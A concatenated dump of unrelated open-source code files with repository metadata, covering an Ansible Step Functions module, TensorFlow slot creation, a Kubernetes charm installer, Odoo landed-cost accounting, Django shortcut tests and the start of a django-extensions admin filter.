if e.response['Error']['Code'] == 'ExecutionAlreadyExists':
# this will never be executed anymore
module.exit_json(changed=False)
module.fail_json_aws(e, msg="Failed to start execution.")
module.exit_json(changed=True, **camel_dict_to_snake_dict(res_execution))
def stop_execution(module, sfn_client):
cause = module.params.get('cause')
error = module.params.get('error')
execution_arn = module.params.get('execution_arn')
try:
# describe_execution is eventually consistent
execution_status = sfn_client.describe_execution(executionArn=execution_arn)['status']
if execution_status != 'RUNNING':
check_mode(module, msg='State machine execution is not running.', changed=False)
module.exit_json(changed=False)
check_mode(module, msg='State machine execution would be stopped.', changed=True)
res = sfn_client.stop_execution(
executionArn=execution_arn,
cause=cause,
error=error
)
except (ClientError, BotoCoreError) as e:
module.fail_json_aws(e, msg="Failed to stop execution.")
module.exit_json(changed=True, **camel_dict_to_snake_dict(res))
def check_mode(module, msg='', changed=False):
if module.check_mode:
module.exit_json(changed=changed, output=msg)
def main():
module_args = dict(
action=dict(choices=['start', 'stop'], default='start'),
name=dict(type='str'),
execution_input=dict(type='json', default={}),
state_machine_arn=dict(type='str'),
cause=dict(type='str', default=''),
error=dict(type='str', default=''),
execution_arn=dict(type='str')
)
module = AnsibleAWSModule(
argument_spec=module_args,
required_if=[('action', 'start', ['name', 'state_machine_arn']),
('action', 'stop', ['execution_arn']),
],
supports_check_mode=True
)
sfn_client = module.client('stepfunctions')
action = module.params.get('action')
if action == "start":
start_execution(module, sfn_client)
else:
stop_execution(module, sfn_client)
if __name__ == '__main__':
main()
| gpl-3.0 | 3,782,714,493,292,858,400 | 31.888325 | 132 | 0.659361 | false |
nburn42/tensorflow | tensorflow/python/training/slot_creator.py | 16 | 7900 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Standard functions for creating slots.
A slot is a `Variable` created with the same shape as a primary variable or
`Tensor`. A slot is always scoped in the namespace of the primary object and
typically has the same device and type.
Slots are typically used as accumulators to track values associated with
the primary object:
```python
# Optimizers can create a slot for each variable to track accumulators
accumulators = {var : create_zeros_slot(var, "momentum") for var in vs}
for var in vs:
apply_momentum(var, accumulators[var], lr, grad, momentum_tensor)
# Slots can also be used for moving averages
mavg = create_slot(var, var.initialized_value(), "exponential_moving_avg")
update_mavg = mavg.assign_sub((mavg - var) * (1 - decay))
```
"""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.training import distribute as distribute_lib
def _create_slot_var(primary, val, scope, validate_shape, shape, dtype):
"""Helper function for creating a slot variable."""
# TODO(lukaszkaiser): Consider allowing partitioners to be set in the current
# scope.
current_partitioner = variable_scope.get_variable_scope().partitioner
variable_scope.get_variable_scope().set_partitioner(None)
  # When initializing from val instead of a callable initializer, the shape
  # is expected to be None, not <unknown> or any fully defined shape.
shape = shape if callable(val) else None
slot = variable_scope.get_variable(
scope, initializer=val, trainable=False,
use_resource=resource_variable_ops.is_resource_variable(primary),
shape=shape, dtype=dtype,
validate_shape=validate_shape)
variable_scope.get_variable_scope().set_partitioner(current_partitioner)
# pylint: disable=protected-access
if isinstance(primary, variables.Variable) and primary._save_slice_info:
# Primary is a partitioned variable, so we need to also indicate that
# the slot is a partitioned variable. Slots have the same partitioning
# as their primaries.
# For examples when using AdamOptimizer in linear model, slot.name
# here can be "linear//weights/Adam:0", while primary.op.name is
# "linear//weight". We want to get 'Adam' as real_slot_name, so we
# remove "'linear//weight' + '/'" and ':0'.
real_slot_name = slot.name[len(primary.op.name + "/"):-2]
slice_info = primary._save_slice_info
slot._set_save_slice_info(variables.Variable.SaveSliceInfo(
slice_info.full_name + "/" + real_slot_name,
slice_info.full_shape[:],
slice_info.var_offset[:],
slice_info.var_shape[:]))
# pylint: enable=protected-access
return slot
def create_slot(primary, val, name, colocate_with_primary=True):
"""Create a slot initialized to the given value.
The type of the slot is determined by the given value.
Args:
primary: The primary `Variable` or `Tensor`.
val: A `Tensor` specifying the initial value of the slot.
name: Name to use for the slot variable.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
# Scope the slot name in the namespace of the primary variable.
# Set "primary.op.name + '/' + name" as default name, so the scope name of
# optimizer can be shared when reuse is True. Meanwhile when reuse is False
# and the same name has been previously used, the scope name will add '_N'
# as suffix for unique identifications.
validate_shape = val.get_shape().is_fully_defined()
if context.executing_eagerly():
prefix = primary._shared_name # pylint: disable=protected-access
else:
prefix = primary.op.name
with variable_scope.variable_scope(None, prefix + "/" + name):
if colocate_with_primary:
distribution_strategy = distribute_lib.get_distribution_strategy()
with distribution_strategy.colocate_vars_with(primary):
return _create_slot_var(primary, val, "", validate_shape, None, None)
else:
return _create_slot_var(primary, val, "", validate_shape, None, None)
def create_slot_with_initializer(primary, initializer, shape, dtype, name,
colocate_with_primary=True):
"""Creates a slot initialized using an `Initializer`.
The type of the slot is determined by the given value.
Args:
primary: The primary `Variable` or `Tensor`.
initializer: An `Initializer`. The initial value of the slot.
shape: Shape of the initial value of the slot.
dtype: Type of the value of the slot.
name: Name to use for the slot variable.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
# Scope the slot name in the namespace of the primary variable.
# Set "primary.op.name + '/' + name" as default name, so the scope name of
# optimizer can be shared when reuse is True. Meanwhile when reuse is False
# and the same name has been previously used, the scope name will add '_N'
# as suffix for unique identifications.
validate_shape = shape.is_fully_defined()
if context.executing_eagerly():
prefix = primary._shared_name # pylint: disable=protected-access
else:
prefix = primary.op.name
with variable_scope.variable_scope(None, prefix + "/" + name):
if colocate_with_primary:
distribution_strategy = distribute_lib.get_distribution_strategy()
with distribution_strategy.colocate_vars_with(primary):
return _create_slot_var(primary, initializer, "", validate_shape, shape,
dtype)
else:
return _create_slot_var(primary, initializer, "", validate_shape, shape,
dtype)
def create_zeros_slot(primary, name, dtype=None, colocate_with_primary=True):
"""Create a slot initialized to 0 with same shape as the primary object.
Args:
primary: The primary `Variable` or `Tensor`.
name: Name to use for the slot variable.
dtype: Type of the slot variable. Defaults to the type of `primary`.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
if dtype is None:
dtype = primary.dtype
slot_shape = primary.get_shape()
if slot_shape.is_fully_defined():
initializer = init_ops.zeros_initializer(dtype)
return create_slot_with_initializer(
primary, initializer, slot_shape, dtype, name,
colocate_with_primary=colocate_with_primary)
else:
if isinstance(primary, variables.Variable):
slot_shape = array_ops.shape(primary.initialized_value())
else:
slot_shape = array_ops.shape(primary)
val = array_ops.zeros(slot_shape, dtype=dtype)
return create_slot(primary, val, name,
colocate_with_primary=colocate_with_primary)
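# A minimal usage sketch (not part of the original module): creating a
# zero-filled accumulator slot for a variable, as an optimizer would.
#
#     var = variables.Variable([1.0, 2.0], name="var")
#     momentum = create_zeros_slot(var, name="momentum")
#     # momentum has var's shape and dtype and is created non-trainable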
| apache-2.0 | 653,503,145,435,336,300 | 40.798942 | 80 | 0.702152 | false |
qma/pants | tests/python/pants_test/java/jar/test_manifest.py | 33 | 1127 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import unittest
from pants.java.jar.manifest import Manifest
class TestManifest(unittest.TestCase):
def test_isempty(self):
manifest = Manifest()
self.assertTrue(manifest.is_empty())
manifest.addentry('Header', 'value')
self.assertFalse(manifest.is_empty())
def test_addentry(self):
manifest = Manifest()
manifest.addentry('Header', 'value')
self.assertEquals(
'Header: value\n', manifest.contents())
def test_too_long_entry(self):
manifest = Manifest()
with self.assertRaises(ValueError):
manifest.addentry(
'1234567890123456789012345678901234567890'
'12345678901234567890123456789', 'value')
def test_nonascii_char(self):
manifest = Manifest()
with self.assertRaises(UnicodeEncodeError):
manifest.addentry('X-Copyright', '© 2015')
| apache-2.0 | 1,113,774,149,357,478,400 | 29.432432 | 93 | 0.701599 | false |
mylons/kubernetes | cluster/juju/charms/trusty/kubernetes-master/hooks/kubernetes_installer.py | 149 | 4138 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shlex
import subprocess
from path import Path
def run(command, shell=False):
""" A convience method for executing all the commands. """
print(command)
if shell is False:
command = shlex.split(command)
output = subprocess.check_output(command, shell=shell)
print(output)
return output
class KubernetesInstaller():
"""
    This class contains the logic needed to install kubernetes binary files.
"""
def __init__(self, arch, version, output_dir):
""" Gather the required variables for the install. """
# The kubernetes-master charm needs certain commands to be aliased.
self.aliases = {'kube-apiserver': 'apiserver',
'kube-controller-manager': 'controller-manager',
'kube-proxy': 'kube-proxy',
'kube-scheduler': 'scheduler',
'kubectl': 'kubectl',
'kubelet': 'kubelet'}
self.arch = arch
self.version = version
self.output_dir = Path(output_dir)
def build(self, branch):
""" Build kubernetes from a github repository using the Makefile. """
# Remove any old build artifacts.
make_clean = 'make clean'
run(make_clean)
# Always checkout the master to get the latest repository information.
git_checkout_cmd = 'git checkout master'
run(git_checkout_cmd)
# When checking out a tag, delete the old branch (not master).
if branch != 'master':
git_drop_branch = 'git branch -D {0}'.format(self.version)
print(git_drop_branch)
rc = subprocess.call(git_drop_branch.split())
if rc != 0:
print('returned: %d' % rc)
# Make sure the git repository is up-to-date.
git_fetch = 'git fetch origin {0}'.format(branch)
run(git_fetch)
if branch == 'master':
git_reset = 'git reset --hard origin/master'
run(git_reset)
else:
# Checkout a branch of kubernetes so the repo is correct.
checkout = 'git checkout -b {0} {1}'.format(self.version, branch)
run(checkout)
# Create an environment with the path to the GO binaries included.
go_path = ('/usr/local/go/bin', os.environ.get('PATH', ''))
go_env = os.environ.copy()
go_env['PATH'] = ':'.join(go_path)
print(go_env['PATH'])
# Compile the binaries with the make command using the WHAT variable.
make_what = "make all WHAT='cmd/kube-apiserver cmd/kubectl "\
"cmd/kube-controller-manager plugin/cmd/kube-scheduler "\
"cmd/kubelet cmd/kube-proxy'"
print(make_what)
rc = subprocess.call(shlex.split(make_what), env=go_env)
def install(self, install_dir=Path('/usr/local/bin')):
""" Install kubernetes binary files from the output directory. """
if not install_dir.isdir():
install_dir.makedirs_p()
# Create the symbolic links to the real kubernetes binaries.
for key, value in self.aliases.iteritems():
target = self.output_dir / key
if target.exists():
link = install_dir / value
if link.exists():
link.remove()
target.symlink(link)
else:
print('Error target file {0} does not exist.'.format(target))
exit(1)
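# A minimal usage sketch (not part of the original charm); the arch, version,
# branch and output directory are illustrative only:
#
#     installer = KubernetesInstaller('amd64', 'v1.0.6',
#                                     '_output/local/bin/linux/amd64')
#     installer.build('master')
#     installer.install()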
| apache-2.0 | 3,144,394,251,100,722,000 | 37.672897 | 78 | 0.60174 | false |
ubiar/odoo | addons/stock_landed_costs/stock_landed_costs.py | 56 | 18361 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
import product
class stock_landed_cost(osv.osv):
_name = 'stock.landed.cost'
_description = 'Stock Landed Cost'
_inherit = 'mail.thread'
_track = {
'state': {
'stock_landed_costs.mt_stock_landed_cost_open': lambda self, cr, uid, obj, ctx=None: obj['state'] == 'done',
},
}
def _total_amount(self, cr, uid, ids, name, args, context=None):
result = {}
for cost in self.browse(cr, uid, ids, context=context):
total = 0.0
for line in cost.cost_lines:
total += line.price_unit
result[cost.id] = total
return result
def _get_cost_line(self, cr, uid, ids, context=None):
cost_to_recompute = []
for line in self.pool.get('stock.landed.cost.lines').browse(cr, uid, ids, context=context):
cost_to_recompute.append(line.cost_id.id)
return cost_to_recompute
def get_valuation_lines(self, cr, uid, ids, picking_ids=None, context=None):
picking_obj = self.pool.get('stock.picking')
lines = []
if not picking_ids:
return lines
for picking in picking_obj.browse(cr, uid, picking_ids):
for move in picking.move_lines:
#it doesn't make sense to make a landed cost for a product that isn't set as being valuated in real time at real cost
if move.product_id.valuation != 'real_time' or move.product_id.cost_method != 'real':
continue
total_cost = 0.0
total_qty = move.product_qty
weight = move.product_id and move.product_id.weight * move.product_qty
volume = move.product_id and move.product_id.volume * move.product_qty
for quant in move.quant_ids:
total_cost += quant.cost
vals = dict(product_id=move.product_id.id, move_id=move.id, quantity=move.product_uom_qty, former_cost=total_cost * total_qty, weight=weight, volume=volume)
lines.append(vals)
if not lines:
raise osv.except_osv(_('Error!'), _('The selected picking does not contain any move that would be impacted by landed costs. Landed costs are only possible for products configured in real time valuation with real price costing method. Please make sure it is the case, or you selected the correct picking'))
return lines
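    # A minimal shape sketch (not part of the original module) of one dict
    # returned by get_valuation_lines(); the numbers are illustrative only:
    #
    #     {'product_id': 42, 'move_id': 7, 'quantity': 5.0,
    #      'former_cost': 125.0, 'weight': 2.5, 'volume': 0.4}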
_columns = {
'name': fields.char('Name', track_visibility='always', readonly=True, copy=False),
'date': fields.date('Date', required=True, states={'done': [('readonly', True)]}, track_visibility='onchange', copy=False),
'picking_ids': fields.many2many('stock.picking', string='Pickings', states={'done': [('readonly', True)]}, copy=False),
'cost_lines': fields.one2many('stock.landed.cost.lines', 'cost_id', 'Cost Lines', states={'done': [('readonly', True)]}, copy=True),
'valuation_adjustment_lines': fields.one2many('stock.valuation.adjustment.lines', 'cost_id', 'Valuation Adjustments', states={'done': [('readonly', True)]}),
'description': fields.text('Item Description', states={'done': [('readonly', True)]}),
'amount_total': fields.function(_total_amount, type='float', string='Total', digits_compute=dp.get_precision('Account'),
store={
'stock.landed.cost': (lambda self, cr, uid, ids, c={}: ids, ['cost_lines'], 20),
'stock.landed.cost.lines': (_get_cost_line, ['price_unit', 'quantity', 'cost_id'], 20),
}, track_visibility='always'
),
'state': fields.selection([('draft', 'Draft'), ('done', 'Posted'), ('cancel', 'Cancelled')], 'State', readonly=True, track_visibility='onchange', copy=False),
'account_move_id': fields.many2one('account.move', 'Journal Entry', readonly=True, copy=False),
'account_journal_id': fields.many2one('account.journal', 'Account Journal', required=True),
}
_defaults = {
'name': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'stock.landed.cost'),
'state': 'draft',
'date': fields.date.context_today,
}
def _create_accounting_entries(self, cr, uid, line, move_id, qty_out, context=None):
product_obj = self.pool.get('product.template')
cost_product = line.cost_line_id and line.cost_line_id.product_id
if not cost_product:
return False
accounts = product_obj.get_product_accounts(cr, uid, line.product_id.product_tmpl_id.id, context=context)
debit_account_id = accounts['property_stock_valuation_account_id']
already_out_account_id = accounts['stock_account_output']
credit_account_id = line.cost_line_id.account_id.id or cost_product.property_account_expense.id or cost_product.categ_id.property_account_expense_categ.id
if not credit_account_id:
raise osv.except_osv(_('Error!'), _('Please configure Stock Expense Account for product: %s.') % (cost_product.name))
return self._create_account_move_line(cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=context)
def _create_account_move_line(self, cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=None):
"""
Generate the account.move.line values to track the landed cost.
        Afterwards, for the goods that are already out of stock, we also
        create the corresponding "out" move lines.
"""
aml_obj = self.pool.get('account.move.line')
aml_obj.create(cr, uid, {
'name': line.name,
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': line.quantity,
'debit': line.additional_landed_cost,
'account_id': debit_account_id
}, context=context)
aml_obj.create(cr, uid, {
'name': line.name,
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': line.quantity,
'credit': line.additional_landed_cost,
'account_id': credit_account_id
}, context=context)
#Create account move lines for quants already out of stock
if qty_out > 0:
aml_obj.create(cr, uid, {
'name': line.name + ": " + str(qty_out) + _(' already out'),
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': qty_out,
'credit': line.additional_landed_cost * qty_out / line.quantity,
'account_id': debit_account_id
}, context=context)
aml_obj.create(cr, uid, {
'name': line.name + ": " + str(qty_out) + _(' already out'),
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': qty_out,
'debit': line.additional_landed_cost * qty_out / line.quantity,
'account_id': already_out_account_id
}, context=context)
return True
def _create_account_move(self, cr, uid, cost, context=None):
vals = {
'journal_id': cost.account_journal_id.id,
'period_id': self.pool.get('account.period').find(cr, uid, cost.date, context=context)[0],
'date': cost.date,
'ref': cost.name
}
return self.pool.get('account.move').create(cr, uid, vals, context=context)
def _check_sum(self, cr, uid, landed_cost, context=None):
"""
        Check that the valuation lines of each cost line sum to the cost
        line amount, and that the overall total amount is correct as well.
"""
costcor = {}
tot = 0
for valuation_line in landed_cost.valuation_adjustment_lines:
if costcor.get(valuation_line.cost_line_id):
costcor[valuation_line.cost_line_id] += valuation_line.additional_landed_cost
else:
costcor[valuation_line.cost_line_id] = valuation_line.additional_landed_cost
tot += valuation_line.additional_landed_cost
res = (tot == landed_cost.amount_total)
for costl in costcor.keys():
if costcor[costl] != costl.price_unit:
res = False
return res
def button_validate(self, cr, uid, ids, context=None):
quant_obj = self.pool.get('stock.quant')
for cost in self.browse(cr, uid, ids, context=context):
if not cost.valuation_adjustment_lines or not self._check_sum(cr, uid, cost, context=context):
raise osv.except_osv(_('Error!'), _('You cannot validate a landed cost which has no valid valuation lines.'))
move_id = self._create_account_move(cr, uid, cost, context=context)
quant_dict = {}
for line in cost.valuation_adjustment_lines:
if not line.move_id:
continue
per_unit = line.final_cost / line.quantity
diff = per_unit - line.former_cost_per_unit
quants = [quant for quant in line.move_id.quant_ids]
for quant in quants:
if quant.id not in quant_dict:
quant_dict[quant.id] = quant.cost + diff
else:
quant_dict[quant.id] += diff
for key, value in quant_dict.items():
quant_obj.write(cr, uid, key, {'cost': value}, context=context)
qty_out = 0
for quant in line.move_id.quant_ids:
if quant.location_id.usage != 'internal':
qty_out += quant.qty
self._create_accounting_entries(cr, uid, line, move_id, qty_out, context=context)
self.write(cr, uid, cost.id, {'state': 'done', 'account_move_id': move_id}, context=context)
return True
def button_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'cancel'}, context=context)
return True
def compute_landed_cost(self, cr, uid, ids, context=None):
line_obj = self.pool.get('stock.valuation.adjustment.lines')
unlink_ids = line_obj.search(cr, uid, [('cost_id', 'in', ids)], context=context)
line_obj.unlink(cr, uid, unlink_ids, context=context)
towrite_dict = {}
        for cost in self.browse(cr, uid, ids, context=context):
if not cost.picking_ids:
continue
picking_ids = [p.id for p in cost.picking_ids]
total_qty = 0.0
total_cost = 0.0
total_weight = 0.0
total_volume = 0.0
total_line = 0.0
vals = self.get_valuation_lines(cr, uid, [cost.id], picking_ids=picking_ids, context=context)
for v in vals:
for line in cost.cost_lines:
v.update({'cost_id': cost.id, 'cost_line_id': line.id})
self.pool.get('stock.valuation.adjustment.lines').create(cr, uid, v, context=context)
total_qty += v.get('quantity', 0.0)
total_cost += v.get('former_cost', 0.0)
total_weight += v.get('weight', 0.0)
total_volume += v.get('volume', 0.0)
total_line += 1
for line in cost.cost_lines:
for valuation in cost.valuation_adjustment_lines:
value = 0.0
if valuation.cost_line_id and valuation.cost_line_id.id == line.id:
if line.split_method == 'by_quantity' and total_qty:
per_unit = (line.price_unit / total_qty)
value = valuation.quantity * per_unit
elif line.split_method == 'by_weight' and total_weight:
per_unit = (line.price_unit / total_weight)
value = valuation.weight * per_unit
elif line.split_method == 'by_volume' and total_volume:
per_unit = (line.price_unit / total_volume)
value = valuation.volume * per_unit
elif line.split_method == 'equal':
value = (line.price_unit / total_line)
elif line.split_method == 'by_current_cost_price' and total_cost:
per_unit = (line.price_unit / total_cost)
value = valuation.former_cost * per_unit
else:
value = (line.price_unit / total_line)
if valuation.id not in towrite_dict:
towrite_dict[valuation.id] = value
else:
towrite_dict[valuation.id] += value
if towrite_dict:
for key, value in towrite_dict.items():
line_obj.write(cr, uid, key, {'additional_landed_cost': value}, context=context)
return True
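# --- Editor's note: illustrative sketch, not part of the original module ---
# How the split methods above allocate a cost line across valuation lines,
# shown for the 'by_quantity' case (values are hypothetical):
def _example_split_by_quantity(price_unit, quantities):
    # Allocate price_unit proportionally to each line's quantity.
    total_qty = sum(quantities)
    per_unit = price_unit / total_qty
    return [qty * per_unit for qty in quantities]
# _example_split_by_quantity(100.0, [3.0, 1.0]) -> [75.0, 25.0]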
class stock_landed_cost_lines(osv.osv):
_name = 'stock.landed.cost.lines'
_description = 'Stock Landed Cost Lines'
def onchange_product_id(self, cr, uid, ids, product_id=False, context=None):
result = {}
if not product_id:
return {'value': {'quantity': 0.0, 'price_unit': 0.0}}
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
result['name'] = product.name
result['split_method'] = product.split_method
result['price_unit'] = product.standard_price
result['account_id'] = product.property_account_expense and product.property_account_expense.id or product.categ_id.property_account_expense_categ.id
return {'value': result}
_columns = {
'name': fields.char('Description'),
'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'),
'product_id': fields.many2one('product.product', 'Product', required=True),
'price_unit': fields.float('Cost', required=True, digits_compute=dp.get_precision('Product Price')),
'split_method': fields.selection(product.SPLIT_METHOD, string='Split Method', required=True),
'account_id': fields.many2one('account.account', 'Account', domain=[('type', '<>', 'view'), ('type', '<>', 'closed')]),
}
class stock_valuation_adjustment_lines(osv.osv):
_name = 'stock.valuation.adjustment.lines'
_description = 'Stock Valuation Adjustment Lines'
def _amount_final(self, cr, uid, ids, name, args, context=None):
result = {}
for line in self.browse(cr, uid, ids, context=context):
result[line.id] = {
'former_cost_per_unit': 0.0,
'final_cost': 0.0,
}
            # Guard the division when the line has no quantity.
            result[line.id]['former_cost_per_unit'] = line.former_cost / (line.quantity or 1.0)
result[line.id]['final_cost'] = (line.former_cost + line.additional_landed_cost)
return result
def _get_name(self, cr, uid, ids, name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.product_id.code or line.product_id.name or ''
if line.cost_line_id:
res[line.id] += ' - ' + line.cost_line_id.name
return res
_columns = {
'name': fields.function(_get_name, type='char', string='Description', store=True),
'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'),
'cost_line_id': fields.many2one('stock.landed.cost.lines', 'Cost Line', readonly=True),
'move_id': fields.many2one('stock.move', 'Stock Move', readonly=True),
'product_id': fields.many2one('product.product', 'Product', required=True),
'quantity': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True),
'weight': fields.float('Weight', digits_compute=dp.get_precision('Product Unit of Measure')),
'volume': fields.float('Volume', digits_compute=dp.get_precision('Product Unit of Measure')),
'former_cost': fields.float('Former Cost', digits_compute=dp.get_precision('Product Price')),
'former_cost_per_unit': fields.function(_amount_final, multi='cost', string='Former Cost(Per Unit)', type='float', digits_compute=dp.get_precision('Account'), store=True),
'additional_landed_cost': fields.float('Additional Landed Cost', digits_compute=dp.get_precision('Product Price')),
'final_cost': fields.function(_amount_final, multi='cost', string='Final Cost', type='float', digits_compute=dp.get_precision('Account'), store=True),
}
_defaults = {
'quantity': 1.0,
'weight': 1.0,
'volume': 1.0,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
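# --- Editor's note: illustrative sketch, not part of the original module ---
# The double entry produced by _create_account_move_line() for a line whose
# additional landed cost is 100.0 with 2 of 10 units already out of stock
# (account names are placeholders):
#
#   debit  stock valuation account   100.0
#   credit cost/expense account      100.0
#   credit stock valuation account    20.0   (2/10 already out)
#   debit  stock output account       20.0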
| agpl-3.0 | 630,939,832,108,810,600 | 52.22029 | 317 | 0.572137 | false |
jpshort/odoo | addons/l10n_at/__init__.py | 438 | 1050 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) conexus.at
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -3,500,147,947,048,035,300 | 42.75 | 79 | 0.612381 | false |
titasakgm/brc-stock | openerp/addons/sale_crm/report/__init__.py | 54 | 1087 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sales_crm_account_invoice_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -4,010,211,136,674,821,600 | 42.48 | 78 | 0.619135 | false |
nathanial/lettuce | tests/integration/lib/Django-1.3/tests/modeltests/get_object_or_404/tests.py | 92 | 2623 | from django.http import Http404
from django.shortcuts import get_object_or_404, get_list_or_404
from django.test import TestCase
from models import Author, Article
class GetObjectOr404Tests(TestCase):
def test_get_object_or_404(self):
a1 = Author.objects.create(name="Brave Sir Robin")
a2 = Author.objects.create(name="Patsy")
# No Articles yet, so we should get a Http404 error.
self.assertRaises(Http404, get_object_or_404, Article, title="Foo")
article = Article.objects.create(title="Run away!")
article.authors = [a1, a2]
# get_object_or_404 can be passed a Model to query.
self.assertEqual(
get_object_or_404(Article, title__contains="Run"),
article
)
# We can also use the Article manager through an Author object.
self.assertEqual(
get_object_or_404(a1.article_set, title__contains="Run"),
article
)
# No articles containing "Camelot". This should raise a Http404 error.
self.assertRaises(Http404,
get_object_or_404, a1.article_set, title__contains="Camelot"
)
# Custom managers can be used too.
self.assertEqual(
get_object_or_404(Article.by_a_sir, title="Run away!"),
article
)
# QuerySets can be used too.
self.assertEqual(
get_object_or_404(Article.objects.all(), title__contains="Run"),
article
)
# Just as when using a get() lookup, you will get an error if more than
# one object is returned.
self.assertRaises(Author.MultipleObjectsReturned,
get_object_or_404, Author.objects.all()
)
# Using an EmptyQuerySet raises a Http404 error.
self.assertRaises(Http404,
get_object_or_404, Article.objects.none(), title__contains="Run"
)
# get_list_or_404 can be used to get lists of objects
self.assertEqual(
get_list_or_404(a1.article_set, title__icontains="Run"),
[article]
)
        # Http404 is raised if the list is empty.
self.assertRaises(Http404,
get_list_or_404, a1.article_set, title__icontains="Shrubbery"
)
# Custom managers can be used too.
self.assertEqual(
get_list_or_404(Article.by_a_sir, title__icontains="Run"),
[article]
)
# QuerySets can be used too.
self.assertEqual(
get_list_or_404(Article.objects.all(), title__icontains="Run"),
[article]
)
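# --- Editor's sketch: the behavior exercised above, in outline ---
# get_object_or_404() accepts a Model, Manager or QuerySet, calls .get() on
# it and re-raises ObjectDoesNotExist as Http404; get_list_or_404() filters
# and raises Http404 on an empty result, roughly like this:
def _get_list_or_404_sketch(queryset, **kwargs):
    obj_list = list(queryset.filter(**kwargs))
    if not obj_list:
        raise Http404('No objects found matching the query.')
    return obj_list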
| gpl-3.0 | 9,134,291,923,948,444,000 | 31.7875 | 79 | 0.59512 | false |
VishvajitP/django-extensions | django_extensions/admin/filter.py | 16 | 1997 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.admin import FieldListFilter
try:
from django.contrib.admin.utils import prepare_lookup_value
except ImportError:
# django < 1.7
from django.contrib.admin.util import prepare_lookup_value
from django.utils.translation import ugettext_lazy as _
class NullFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.lookup_kwarg = '{0}__isnull'.format(field_path)
super(NullFieldListFilter, self).__init__(field, request, params, model, model_admin, field_path)
lookup_choices = self.lookups(request, model_admin)
self.lookup_choices = () if lookup_choices is None else list(lookup_choices)
def expected_parameters(self):
return [self.lookup_kwarg]
